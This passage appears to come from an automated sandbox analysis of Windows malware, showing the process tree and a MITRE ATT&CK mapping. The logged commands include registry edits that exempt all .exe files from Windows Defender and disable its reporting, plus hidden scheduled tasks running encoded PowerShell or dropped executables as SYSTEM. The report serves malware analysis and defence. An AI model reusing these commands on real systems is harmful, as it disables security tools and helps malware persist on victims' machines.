- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3832

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:1776

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3608 -ip 3608
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 860 -ip 860
1⤵
PID:1932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4364 -ip 4364
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3616 -ip 3616
1⤵
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392
1⤵
PID:4948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 4308
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4164 -ip 4164
1⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3616 -ip 3616
1⤵
PID:5584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4364 -ip 4364
1⤵
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392
1⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\7zSEBE4.tmp\Install.exe
.\Install.exe /S /site_id "525403"
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5884

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
2⤵
PID:5500

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
3⤵
PID:220

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
4⤵
PID:4116

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
4⤵
PID:4980

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
2⤵
PID:4696

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
3⤵
PID:4848

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3508

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2268

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "glXJtTKwq" /SC once /ST 00:01:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4600

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "glXJtTKwq"
2⤵
PID:3452

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "glXJtTKwq"
2⤵
PID:4476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bbbRMuC.exe\" j6 /site_id 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4308 -ip 4308
1⤵
PID:5096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4300 -ip 4300
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 4308
1⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 1204 -ip 1204
1⤵
PID:3508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 4164
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2412 -ip 2412
1⤵
PID:4480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4308 -ip 4308
1⤵
PID:2172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 4164
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4308 -ip 4308
1⤵
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4164 -ip 4164
1⤵
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4308 -ip 4308
1⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4164 -ip 4164
1⤵
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3260

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:2864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4308 -ip 4308
1⤵
PID:1504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4996 -ip 4996
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4308 -ip 4308
1⤵
PID:5972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4164 -ip 4164
1⤵
PID:4372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4164 -ip 4164
1⤵
PID:1788

C:\Users\Admin\AppData\Roaming\jfvffjr
C:\Users\Admin\AppData\Roaming\jfvffjr
1⤵
- Executes dropped EXE
PID:4268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4164 -ip 4164
1⤵
PID:5180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5520

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:4320

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Hidden Files and Directories

T1158

Impair Defenses

T1562

File Permissions Modification

T1222

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery